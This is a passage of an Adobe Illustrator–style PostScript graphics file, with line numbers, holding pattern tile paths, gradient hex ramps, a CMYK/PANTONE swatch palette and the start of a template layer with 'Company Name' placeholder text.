29.25 V 3911 | 15.623 27.4326 13.3691 21.6074 12.8555 20.5439 C 3912 | 12.2168 20.4883 10.8096 23.2285 10.8457 24.7266 C 3913 | 9.7129 23.9707 8.0488 24.0918 6.4463 24.3779 C 3914 | 7.0186 23.2891 6.6172 21.3447 5.8164 20.5439 C 3915 | 6.8184 20.5801 8.1699 19.8652 9.4785 18.8838 C 3916 | 8.6436 18.0645 6.8164 18.2246 4.9004 18.8838 C 3917 | 4.9004 17.5107 4.0781 15.7734 3.2412 14.5918 C 3918 | 4.5576 14.6484 5.7031 13.9629 6.5605 12.9316 C 3919 | 7.2256 14.5 9.2598 15.6133 10.166 15.5645 C 3920 | 10.1826 14.1992 8.6094 12.1094 7.5879 11.7109 C 3921 | 8.1875 11.041 9.207 9.5107 10.166 7.0947 C 3922 | 10.9648 9.0205 12.1348 10.2627 13.3672 11.1953 C 3923 | 12.2256 12.7578 12.3994 13.6289 12.7988 15.1074 C 3924 | 13.541 14.5664 14.5723 14.1338 14.7441 12.1309 C 3925 | 16.4609 12.416 17.5957 12.3447 19.0938 11.4434 C 3926 | 18.6387 13.1055 18.6348 14.707 18.9551 16.4063 C 3927 | 17.1055 16.2666 15.5449 16.4795 14.5156 17.9688 C 3928 | 15.3457 18.1953 17.6055 18.2549 18.4795 17.3223 C 3929 | 18.8066 18.3047 19.7012 19.7109 21.1475 20.4043 C 3930 | 19.707 20.6641 18.7227 21.7637 17.8135 23.4492 C 3931 | 17.1006 22.0332 14.873 20.3691 13.3711 20.3145 C 3932 | 15.373 24.3779 15.373 27.2959 13.8525 29.9844 C 3933 | f 3934 | 41.2324 26.0742 m 3935 | 41.5518 26.7021 41.7549 26.959 V 3936 | 44.1523 25.0176 48.958 28.3262 49.8535 29.0957 C 3937 | 49.7432 29.7266 47.6182 30.8643 45.9004 29.834 C 3938 | 46.3408 31.123 45.4395 33.084 44.2402 34.126 C 3939 | 45.9805 34.0254 48.126 35.3867 48.6484 36.1289 C 3940 | 48.8701 35.1514 50.0527 33.8809 51.3379 32.8672 C 3941 | 51.6895 33.8398 50.9941 35.958 50.0781 37.5605 C 3942 | 51.3125 38.0605 52.4248 38.9912 52.8828 40.25 C 3943 | 53.3398 38.9336 54.3428 38.2598 55.6875 37.5039 C 3944 | 54.5273 36.0762 53.7471 33.9023 54.0273 33.0391 C 3945 | 55.3496 33.374 56.9209 36.0918 57.0439 37.1816 C 3946 | 57.9189 36.415 59.4727 35.7285 62.0537 35.4219 C 3947 | 60.3535 34.3438 59.9902 32.3516 59.4063 30.9219 C 3948 | 58.2588 31.3682 56.0898 31.4277 55.1152 30.8643 C 3949 | 55.8281 30.2852 57.168 29.7344 59.1777 29.7207 C 3950 | 59.1777 28.1758 59.6406 27.043 60.8945 25.8281 C 3951 | 59.1719 25.8418 57.0723 25.3555 55.5762 24.9629 C 3952 | 55.3281 26.292 54.4844 27.8887 53.3398 28.2891 C 3953 | 53.334 27.4277 53.5996 25.1797 54.4844 24.5117 C 3954 | 53.6201 23.9443 52.3672 22.5674 51.9102 20.8496 C 3955 | 51.2881 22.1758 50.4268 23.4805 48.5645 23.9238 C 3956 | 49.749 24.9766 50.584 26.9941 50.25 28.4609 C 3957 | 45.1973 24.4785 42.5215 25.7773 41.2324 26.0742 C 3958 | f 3959 | 27.7578 38.7324 m 3960 | 28.4346 38.9316 28.7246 39.084 V 3961 | 27.2559 41.7969 31.707 46.0776 32.627 46.8169 C 3962 | 33.2275 46.5918 33.3477 44.0586 32.6699 42.7227 C 3963 | 33.5137 42.8457 35.7031 41.4678 36.4609 40.1787 C 3964 | 36.5254 40.8652 38.0957 43.8066 38.9219 44.1846 C 3965 | 38.002 44.582 37.3359 46.0547 36.5742 47.5039 C 3966 | 37.5957 47.6709 38.9961 46.7485 40.4668 45.8438 C 3967 | 40.9814 46.6445 42.3555 47.6177 43.6143 48.1328 C 3968 | 42.5264 48.8198 42.0313 49.5615 41.5352 51.0205 C 3969 | 40.4922 50.4556 38.3057 50.3057 37.7764 50.5938 C 3970 | 38.291 51.7056 40.5371 52.2485 41.2676 52.1958 C 3971 | 41.0137 53.0576 40.8652 55.2109 41.0391 57.8037 C 3972 | 39.3789 56.4878 37.834 55.1719 36.1738 55.2285 C 3973 | 36.4434 53.8076 35.8076 52.002 35.4307 51.5088 C 3974 | 34.8574 52.2529 34.4463 53.0796 34.8008 55.0576 C 3975 | 33.3486 55.5425 32.1113 56.0879 30.7373 57.3467 C 3976 | 30.7373 55.5146 30.166 54.314 29.2969 53.0366 C 3977 | 30.5576 52.5488 31.8301 51.3467 31.8252 50.3076 C 3978 | 30.9775 50.46 29.2852 51.2036 28.793 52.1958 C 3979 | 28.0742 51.4497 26.3906 50.1396 24.7871 50.1357 C 3980 | 25.9746 49.2817 26.8945 48.2466 26.9893 46.335 C 3981 | 28.2422 47.3057 30.6953 47.9209 32.0752 47.3237 C 3982 | 27.2344 43.0869 27.7031 40.0547 27.7578 38.7324 C 3983 | f 3984 | 13.5195 70.3916 m 3985 | 12.9941 69.9209 12.7988 69.6587 V 3986 | 15.2891 67.8418 13.0352 62.0146 12.5225 60.9517 C 3987 | 11.8828 60.8955 10.4766 63.6367 10.5117 65.1348 C 3988 | 9.3809 64.3789 7.7148 64.4995 6.1133 64.7856 C 3989 | 6.6855 63.6987 6.2842 61.7529 5.4834 60.9517 C 3990 | 6.4854 60.9878 7.8359 60.2729 9.1455 59.2925 C 3991 | 8.3105 58.4717 6.4834 58.6338 4.5674 59.2925 C 3992 | 4.5674 57.9189 3.7461 56.1816 2.9082 54.9995 C 3993 | 4.2246 55.0576 5.3691 54.3706 6.2275 53.3408 C 3994 | 6.8926 54.9097 8.9258 56.0215 9.832 55.9727 C 3995 | 9.8496 54.6079 8.2764 52.5176 7.2539 52.1187 C 3996 | 7.8545 51.4497 8.873 49.9189 9.832 47.5039 C 3997 | 10.6309 49.4297 11.8008 50.6719 13.0342 51.6045 C 3998 | 11.8926 53.1655 12.0664 54.0366 12.4648 55.5146 C 3999 | 13.209 54.9746 14.2393 54.5415 14.4102 52.5386 C 4000 | 16.127 52.8247 17.2637 52.7529 18.7598 51.8525 C 4001 | 18.3057 53.5137 18.3027 55.1147 18.623 56.8149 C 4002 | 16.7725 56.6748 15.2129 56.8887 14.1826 58.377 C 4003 | 15.0117 58.6035 17.2725 58.6626 18.1465 57.731 C 4004 | 18.4736 58.7129 19.3691 60.1187 20.8145 60.8125 C 4005 | 19.375 61.0728 18.3896 62.1719 17.4805 63.8579 C 4006 | 16.7676 62.4429 14.541 60.7769 13.0371 60.7227 C 4007 | 15.041 64.7856 15.041 67.7046 13.5195 70.3916 C 4008 | f 4009 | 41.2324 64.4824 m 4010 | 41.5518 65.1113 41.7549 65.3682 V 4011 | 44.1523 63.4272 48.958 66.7354 49.8535 67.5034 C 4012 | 49.7432 68.1362 47.6182 69.2725 45.9004 68.2422 C 4013 | 46.3408 69.5313 45.4395 71.4922 44.2402 72.5342 C 4014 | 45.9805 72.4341 48.126 73.7954 48.6484 74.5371 C 4015 | 48.8701 73.5601 50.0527 72.29 51.3379 71.2754 C 4016 | 51.6895 72.249 50.9941 74.3662 50.0781 75.9683 C 4017 | 51.3125 76.4692 52.4248 77.3994 52.8828 78.6582 C 4018 | 53.3398 77.3423 54.3428 76.667 55.6875 75.9111 C 4019 | 54.5273 74.4844 53.7471 72.3101 54.0273 71.4473 C 4020 | 55.3496 71.7822 56.9209 74.5 57.0439 75.5903 C 4021 | 57.9189 74.8232 59.4727 74.1372 62.0537 73.8311 C 4022 | 60.3535 72.7534 59.9902 70.7612 59.4063 69.3301 C 4023 | 58.2588 69.7773 56.0898 69.8364 55.1152 69.2725 C 4024 | 55.8281 68.6934 57.168 68.1431 59.1777 68.1284 C 4025 | 59.1777 66.583 59.6406 65.4512 60.8945 64.2373 C 4026 | 59.1719 64.249 57.0723 63.7632 55.5762 63.3721 C 4027 | 55.3281 64.7002 54.4844 66.2974 53.3398 66.6973 C 4028 | 53.334 65.8364 53.5996 63.5874 54.4844 62.9214 C 4029 | 53.6201 62.353 52.3672 60.9751 51.9102 59.2583 C 4030 | 51.2881 60.583 50.4268 61.8882 48.5645 62.333 C 4031 | 49.749 63.3862 50.584 65.4033 50.25 66.8691 C 4032 | 45.1973 62.8872 42.5215 64.1851 41.2324 64.4824 C 4033 | f 4034 | %AI6_EndPatternLayer 4035 | ) & 4036 | ] E 4037 | %AI3_EndPattern 4038 | %AI3_BeginPattern: (Stripes) 4039 | (Stripes) 8.45 4.6001 80.45 76.6001 [ 4040 | %AI3_Tile 4041 | (0 O 0 R 1 0.07 1 0 k 4042 | 1 0.07 1 0 K 4043 | ) @ 4044 | ( 4045 | %AI6_BeginPatternLayer 4046 | 800 Ar 4047 | 0 J 0 j 3.6 w 4 M []0 d 4048 | %AI3_Note: 4049 | 0 D 4050 | 0 XR 4051 | 8.2 8.2 m 4052 | 80.7 8.2 L 4053 | S 4054 | 8.2 22.6001 m 4055 | 80.7 22.6001 L 4056 | S 4057 | 8.2 37.0002 m 4058 | 80.7 37.0002 L 4059 | S 4060 | 8.2 51.4 m 4061 | 80.7 51.4 L 4062 | S 4063 | 8.2 65.8001 m 4064 | 80.7 65.8001 L 4065 | S 4066 | 8.2 15.4 m 4067 | 80.7 15.4 L 4068 | S 4069 | 8.2 29.8001 m 4070 | 80.7 29.8001 L 4071 | S 4072 | 8.2 44.2 m 4073 | 80.7 44.2 L 4074 | S 4075 | 8.2 58.6001 m 4076 | 80.7 58.6001 L 4077 | S 4078 | 8.2 73.0002 m 4079 | 80.7 73.0002 L 4080 | S 4081 | %AI6_EndPatternLayer 4082 | ) & 4083 | ] E 4084 | %AI3_EndPattern 4085 | %AI5_End_NonPrinting-- 4086 | %AI5_Begin_NonPrinting 4087 | Np 4088 | 4 Bn 4089 | %AI5_BeginGradient: (Black, White) 4090 | (Black, White) 0 2 Bd 4091 | [ 4092 | < 4093 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4094 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4095 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4096 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4097 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4098 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4099 | 0F0E0D0C0B0A09080706050403020100 4100 | > 4101 | 0 %_Br 4102 | [ 4103 | 0 0 50 100 %_Bs 4104 | 1 0 50 0 %_Bs 4105 | BD 4106 | %AI5_EndGradient 4107 | %AI5_BeginGradient: (Chrome) 4108 | (Chrome) 0 6 Bd 4109 | [ 4110 | 0 4111 | < 4112 | 464646454545444444444343434342424241414141404040403F3F3F3E3E3E3E3D3D3D3C3C3C3C3B 4113 | 3B3B3B3A3A3A39393939383838383737373636363635353535343434333333333232323131313130 4114 | 3030302F2F2F2E2E2E2E2D2D2D2D2C2C2C2B2B2B2B2A2A2A2A292929282828282727272626262625 4115 | 2525252424242323232322222222212121202020201F1F1F1F1E1E1E1D1D1D1D1C1C1C1B1B1B1B1A 4116 | 1A1A1A1919191818181817171717161616151515151414141413131312121212111111101010100F 4117 | 0F0F0F0E0E0E0D0D0D0D0C0C0C0C0B0B0B0A0A0A0A09090909080808070707070606060505050504 4118 | 04040403030302020202010101010000 4119 | > 4120 | < 4121 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4122 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4123 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4124 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4125 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4126 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4127 | 0F0E0D0C0B0A09080706050403020100 4128 | > 4129 | < 4130 | 1F1E1E1E1E1E1E1E1E1E1D1D1D1D1D1D1D1D1C1C1C1C1C1C1C1C1B1B1B1B1B1B1B1B1B1A1A1A1A1A 4131 | 1A1A1A19191919191919191818181818181818181717171717171717161616161616161615151515 4132 | 15151515151414141414141414131313131313131312121212121212121211111111111111111010 4133 | 1010101010100F0F0F0F0F0F0F0F0F0E0E0E0E0E0E0E0E0D0D0D0D0D0D0D0D0C0C0C0C0C0C0C0C0C 4134 | 0B0B0B0B0B0B0B0B0A0A0A0A0A0A0A0A090909090909090909080808080808080807070707070707 4135 | 07060606060606060606050505050505050504040404040404040303030303030303030202020202 4136 | 02020201010101010101010000000000 4137 | > 4138 | 1 %_Br 4139 | 0 4140 | 0.275 4141 | 1 4142 | < 4143 | 6B6A696867666564636261605F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544 4144 | 434241403F3E3D3C3B3A393837363534333231302F2E2D2C2B2A292827262524232221201F 4145 | > 4146 | 1 %_Br 4147 | 0 4148 | < 4149 | 00000101010102020202030303040404040505050506060607070707080808090909090A0A0A0A0B 4150 | 0B0B0C0C0C0C0D0D0D0D0E0E0E0F0F0F0F1010101011111112121212131313141414141515151516 4151 | 161617171717181818181919191A1A1A1A1B1B1B1C1C1C1C1D1D1D1D1E1E1E1F1F1F1F2020202021 4152 | 212122222222232323232424242525252526262626272727282828282929292A2A2A2A2B2B2B2B2C 4153 | 2C2C2D2D2D2D2E2E2E2E2F2F2F303030303131313132323233333333343434353535353636363637 4154 | 373738383838393939393A3A3A3B3B3B3B3C3C3C3D3D3D3D3E3E3E3E3F3F3F404040404141414142 4155 | 42424343434344444444454545464646 4156 | > 4157 | < 4158 | 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F2021222324252627 4159 | 28292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F 4160 | 505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F7071727374757677 4161 | 78797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9F 4162 | A0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7 4163 | C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEF 4164 | F0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF 4165 | > 4166 | < 4167 | 00000101020203030304040505050606070708080809090A0A0B0B0B0C0C0D0D0D0E0E0F0F101010 4168 | 1111121212131314141515151616171718181819191A1A1A1B1B1C1C1D1D1D1E1E1F1F1F20202121 4169 | 222222232324242525252626272727282829292A2A2A2B2B2C2C2D2D2D2E2E2F2F2F303031313232 4170 | 32333334343435353636373737383839393A3A3A3B3B3C3C3C3D3D3E3E3F3F3F4040414142424243 4171 | 434444444545464647474748484949494A4A4B4B4C4C4C4D4D4E4E4F4F4F50505151515252535354 4172 | 54545555565657575758585959595A5A5B5B5C5C5C5D5D5E5E5E5F5F606061616162626363646464 4173 | 6565666666676768686969696A6A6B6B 4174 | > 4175 | 1 %_Br 4176 | 1 4177 | 0 %_Br 4178 | < 4179 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4180 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4181 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4182 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4183 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4184 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4185 | 0F0E0D0C0B0A09080706050403020100 4186 | > 4187 | < 4188 | 4D4C4C4C4B4B4B4A4A4A4A4949494848484747474746464645454544444444434343424242414141 4189 | 414040403F3F3F3E3E3E3E3D3D3D3C3C3C3B3B3B3B3A3A3A39393938383838373737363636353535 4190 | 35343434333333323232323131313030302F2F2F2E2E2E2E2D2D2D2C2C2C2B2B2B2B2A2A2A292929 4191 | 282828282727272626262525252524242423232322222222212121202020201F1F1F1E1E1E1D1D1D 4192 | 1D1C1C1C1B1B1B1A1A1A1A1919191818181717171616161615151514141413131313121212111111 4193 | 101010100F0F0F0E0E0E0D0D0D0D0C0C0C0B0B0B0A0A0A0A09090908080807070707060606050505 4194 | 04040404030303020202010101010000 4195 | > 4196 | 0 4197 | 0 4198 | 1 %_Br 4199 | [ 4200 | 1 0 50 92 %_Bs 4201 | 0 0.275 1 0.12 1 50 59 %_Bs 4202 | 0 0.275 1 0.42 1 50 50 %_Bs 4203 | 1 0 50 49 %_Bs 4204 | 1 0 50 41 %_Bs 4205 | 1 0.3 0 0 1 50 0 %_Bs 4206 | BD 4207 | %AI5_EndGradient 4208 | %AI5_BeginGradient: (Rainbow) 4209 | (Rainbow) 0 6 Bd 4210 | [ 4211 | < 4212 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4213 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4214 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4215 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4216 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4217 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4218 | 0F0E0D0C0B0A09080706050403020100 4219 | > 4220 | 1 4221 | 0 4222 | 0 4223 | 1 %_Br 4224 | 1 4225 | < 4226 | 0708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E 4227 | 2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F50515253545556 4228 | 5758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E 4229 | 7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6 4230 | A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCE 4231 | CFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6 4232 | F7F8F9FAFBFCFDFEFF 4233 | > 4234 | 0 4235 | 0 4236 | 1 %_Br 4237 | 1 4238 | < 4239 | 00000000000000000000000000000000000001010101010101010101010101010101010101010101 4240 | 01010101010101010101010101010202020202020202020202020202020202020202020202020202 4241 | 02020202020202020202030303030303030303030303030303030303030303030303030303030303 4242 | 03030303030304040404040404040404040404040404040404040404040404040404040404040404 4243 | 04040505050505050505050505050505050505050505050505050505050505050505050505050606 4244 | 06060606060606060606060606060606060606060606060606060606060606060607070707070707 4245 | 07070707070707070707070707070707 4246 | > 4247 | < 4248 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4249 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4250 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4251 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4252 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4253 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4254 | 0F0E0D0C0B0A09080706050403020100 4255 | > 4256 | 0 4257 | 1 %_Br 4258 | < 4259 | 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F2021222324252627 4260 | 28292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F 4261 | 505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F7071727374757677 4262 | 78797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9F 4263 | A0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7 4264 | C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEF 4265 | F0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF 4266 | > 4267 | 0 4268 | 1 4269 | 0 4270 | 1 %_Br 4271 | 0 4272 | < 4273 | FFFEFDFCFBFAF9F8F7F6F5F4F3F2F1F0EFEEEDECEBEAE9E8E7E6E5E4E3E2E1E0DFDEDDDCDBDAD9D8 4274 | D7D6D5D4D3D2D1D0CFCECDCCCBCAC9C8C7C6C5C4C3C2C1C0BFBEBDBCBBBAB9B8B7B6B5B4B3B2B1B0 4275 | AFAEADACABAAA9A8A7A6A5A4A3A2A1A09F9E9D9C9B9A999897969594939291908F8E8D8C8B8A8988 4276 | 87868584838281807F7E7D7C7B7A797877767574737271706F6E6D6C6B6A69686766656463626160 4277 | 5F5E5D5C5B5A595857565554535251504F4E4D4C4B4A494847464544434241403F3E3D3C3B3A3938 4278 | 37363534333231302F2E2D2C2B2A292827262524232221201F1E1D1C1B1A19181716151413121110 4279 | 0F0E0D0C0B0A09080706050403020100 4280 | > 4281 | 1 4282 | 0 4283 | 1 %_Br 4284 | [ 4285 | 0 1 0 0 1 50 100 %_Bs 4286 | 1 1 0 0 1 50 80 %_Bs 4287 | 1 0.0279 0 0 1 50 60 %_Bs 4288 | 1 0 1 0 1 50 40 %_Bs 4289 | 0 0 1 0 1 50 20 %_Bs 4290 | 0 1 1 0 1 50 0 %_Bs 4291 | BD 4292 | %AI5_EndGradient 4293 | %AI5_BeginGradient: (Yellow & Orange Radial) 4294 | (Yellow & Orange Radial) 1 2 Bd 4295 | [ 4296 | 0 4297 | < 4298 | 0001010203040506060708090A0B0C0C0D0E0F10111213131415161718191A1B1C1D1D1E1F202122 4299 | 232425262728292A2B2B2C2D2E2F303132333435363738393A3B3C3D3E3E3F404142434445464748 4300 | 494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F60606162636465666768696A6B6C6D6E6F 4301 | 707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C 4302 | > 4303 | < 4304 | FFFFFFFFFEFEFEFEFEFEFEFDFDFDFDFDFDFCFCFCFCFCFCFBFBFBFBFBFBFAFAFAFAFAFAF9F9F9F9F9 4305 | F9F8F8F8F8F8F8F7F7F7F7F7F7F6F6F6F6F6F6F5F5F5F5F5F5F4F4F4F4F4F3F3F3F3F3F3F2F2F2F2 4306 | F2F2F1F1F1F1F1F0F0F0F0F0F0EFEFEFEFEFEFEEEEEEEEEEEDEDEDEDEDEDECECECECECEBEBEBEBEB 4307 | EBEAEAEAEAEAE9E9E9E9E9E9E8E8E8E8E8E8E7E7E7E7E7E6E6E6E6E6E6 4308 | > 4309 | 0 4310 | 1 %_Br 4311 | [ 4312 | 0 0 1 0 1 52 19 %_Bs 4313 | 0 0.55 0.9 0 1 50 100 %_Bs 4314 | BD 4315 | %AI5_EndGradient 4316 | %AI5_End_NonPrinting-- 4317 | %AI5_BeginPalette 4318 | 0 0 Pb 4319 | 0 0 0 1 k 4320 | ([Registration]\012 3) Pc 4321 | 0 0 0 1 k 4322 | ([Registration]\012 1) Pc 4323 | ([Registration]\012 1) Pc 4324 | ([Registration]\012 1) Pc 4325 | ([Registration]\012 4) Pc 4326 | 0 0 0 0 k 4327 | (C=0 M=0 Y=0 K=0) Pc 4328 | 0 0 0 1 k 4329 | (C=0 M=0 Y=0 K=100) Pc 4330 | 0 0.1 1 0 k 4331 | (C=0 M=10 Y=100 K=0) Pc 4332 | 0 0.5 0 0 k 4333 | (C=0 M=50 Y=0 K=0) Pc 4334 | 0 0.5 1 0 k 4335 | (C=0 M=50 Y=100 K=0) Pc 4336 | 1 0.55 1 0 k 4337 | (C=100 M=55 Y=100 K=0) Pc 4338 | 1 0.9 0.1 0 k 4339 | (C=100 M=90 Y=10 K=0) Pc 4340 | 0.15 1 1 0 k 4341 | (C=15 M=100 Y=100 K=0) Pc 4342 | 0.45 0.9 0 0 k 4343 | (C=45 M=90 Y=0 K=0) Pc 4344 | 0.5 0.4 0.3 0 k 4345 | (C=50 M=40 Y=30 K=0) Pc 4346 | 0.5 0.85 1 0 k 4347 | (C=50 M=85 Y=100 K=0) Pc 4348 | 0.75 0.05 1 0 k 4349 | (C=75 M=5 Y=100 K=0) Pc 4350 | 0.75 0.9 0 0 k 4351 | (C=75 M=90 Y=0 K=0) Pc 4352 | 0.8 0.05 0 0 k 4353 | (C=80 M=5 Y=0 K=0) Pc 4354 | Bb 4355 | 2 (Black, White) -3923.5 4013.5 0 0 1 0 0 1 0 0 Bg 4356 | 0 BB 4357 | (Black, White) Pc 4358 | Bb 4359 | 2 (Chrome) -3923.5 4013.5 0 0 1 0 0 1 0 0 Bg 4360 | 0 BB 4361 | (Chrome) Pc 4362 | Bb 4363 | 2 (Rainbow) -3923.5 4013.5 0 0 1 0 0 1 0 0 Bg 4364 | 0 BB 4365 | (Rainbow) Pc 4366 | Bb 4367 | 0 0 0 0 Bh 4368 | 2 (Yellow & Orange Radial) -3923.5 4013.5 0 0 1 0 0 1 0 0 Bg 4369 | 0 BB 4370 | (Yellow & Orange Radial) Pc 4371 | (Brick) 0 0 1 1 0 0 0 0 0 [1 0 0 1 0 0] p 4372 | (Brick\012 2) Pc 4373 | (Confetti) 0 0 1 1 0 0 0 0 0 [1 0 0 1 0 0] p 4374 | (Confetti\012 1) Pc 4375 | (Leaves - Fall ) 0 0 1 1 0 0 0 0 0 [1 0 0 1 0 0] p 4376 | (Leaves - Fall ) Pc 4377 | (Stripes) 0 0 1 1 0 0 0 0 0 [1 0 0 1 0 0] p 4378 | (Stripes) Pc 4379 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4380 | (PANTONE 286 CVU) Pc 4381 | PB 4382 | %AI5_EndPalette 4383 | %%EndSetup 4384 | %AI5_BeginLayer 4385 | 1 1 1 1 0 0 0 79 128 255 Lb 4386 | (Layer 1) Ln 4387 | 0 A 4388 | 0 O 4389 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0.8 x 4390 | 800 Ar 4391 | 0 J 0 j 1 w 4 M []0 d 4392 | %AI3_Note: 4393 | 0 D 4394 | 0 XR 4395 | 252 -31.5 m 4396 | 522 -31.5 L 4397 | 522 -580.5 L 4398 | 252 -580.5 L 4399 | 252 -31.5 L 4400 | f 4401 | 1 Ap 4402 | 95.0552 -580.5 m 4403 | 95.0552 -31.5 L 4404 | 36 -31.5 L 4405 | 36 -580.5 L 4406 | 95.0552 -580.5 L 4407 | f 4408 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4409 | 756 -580.5 m 4410 | 756 -562.5 L 4411 | 36 -562.5 L 4412 | 36 -580.5 L 4413 | 756 -580.5 L 4414 | f 4415 | 0 Ap 4416 | 0 R 4417 | 0.65 G 4418 | 2 J 2 w [0 20 ]0 d 4419 | 750.46 -390.2549 m 4420 | 750.46 -536.2148 l 4421 | S 4422 | 0 To 4423 | 1 0 0 1 735.46 -520.7559 0 Tp 4424 | 0 Tv 4425 | TP 4426 | -54.4341 0 Td 4427 | 0 Tr 4428 | 0 O 4429 | 0 g 4430 | 0 J 1 w []0 d 4431 | %_ 0 50 XQ 4432 | /_Helvetica-Bold 12 11.5441 -2.736 Tf 4433 | 0 Ts 4434 | 100 100 Tz 4435 | 0 Tt 4436 | %_0 0 100 100 Xu 4437 | %AI55J_GlyphSubst: GlyphSubstNone 4438 | 1 TA 4439 | %_ 0 XL 4440 | 0 TY 4441 | 0 TV 4442 | 36 0 Xb 4443 | XB 4444 | 0 0 5 TC 4445 | 100 100 200 TW 4446 | 25 TG 4447 | 0 0 0 Ti 4448 | 2 Ta 4449 | 0 1 2 2 99 Th 4450 | 0 Tq 4451 | 0 Tg 4452 | 17.5 0 Tl 4453 | 0 Tc 4454 | 0 Tw 4455 | (Compan) Tx 1 20 Tk 4456 | (y\r) Tx 1 0 Tk 4457 | 18.4224 -17.5 Td 4458 | ( Name) Tx 1 0 Tk 4459 | (\r) TX 4460 | TO 4461 | 1 Ap 4462 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4463 | 756 -539.8154 m 4464 | 756 -529.0156 L 4465 | 